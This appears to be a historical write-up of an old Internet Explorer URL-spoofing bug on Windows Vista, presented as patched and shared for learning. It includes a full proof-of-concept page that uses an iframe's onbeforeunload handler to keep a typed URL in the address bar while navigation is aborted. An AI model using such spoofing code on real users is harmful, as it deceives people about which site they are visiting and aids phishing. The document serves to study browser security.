URL Spoofing via onbeforeunload — Vista-Compatible Variant

The XP-only URL spoof using onbeforeunload and history.go(0) stopped working on Windows Vista. After some digging, I found a small adjustment that restored the behavior on Vista: instead of calling history.go(0) directly in the top window’s onbeforeunload, I injected the handler into an iframe using execScript, and from there called top.history.go(0). That one level of indirection was enough to make it work on both platforms.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>urlSpoofOnBeforeUnloadVista</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>urlSpoofOnBeforeUnloadVista</h2>
</center>
<div id="mainText">
	<b>Note:</b> This version is the same as [urlSpoofOnBeforeUnload] but with a little change so <b>now it works
	well also on Vista</b>.<br /><br />
	While trying to navigate to a different URL, we will abort the navigaton but keep the typed URL in the addressBar.<br />
	This is similar to this one [http://lcamtuf.coredump.cx/ietrap/] but it works only on<b>before</b>unload and it's not
	using the document.open. Just a top.history.go(0) inside the IFRAME.<br /><br />
	In other words, we achieve the same thing [http://lcamtuf.coredump.cx/ietrap/] but using a different technique.<br /><br />
	<font color="blue">
		<b>Go ahead! Type any URL in the addressBar, and let's see what happens...</b><br /><br />
	</font>
</div>
<hr />
<center>
	<iframe name="myFrame" width="100" height="100"></iframe>
</center>
<script language="JavaScript">
if (!window.opener)
{
	window.opener = 1;
	// Here we execute the onbeforeunload, but inside the IFRAME.
	// This is what makes this version works on Vista.
	myFrame.execScript('window.onbeforeunload = function(){top.history.go(0);}');
}
else
{
	document.all.mainText.innerHTML = 'The URL on the addressBar has changed, however, we are still on the same page.';
}

</script>
</font>
</body>
</html>

On Vista, IE ran in Protected Mode with enhanced process isolation, which changed how the top-level onbeforeunload event interacted with the history object. By registering the onbeforeunload handler inside the iframe via execScript instead, and pointing it at top.history.go(0), the call took a slightly different code path that Vista did not block. The net effect is the same: the user’s typed URL stays in the address bar while the page never navigates, creating a convincing visual spoof.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.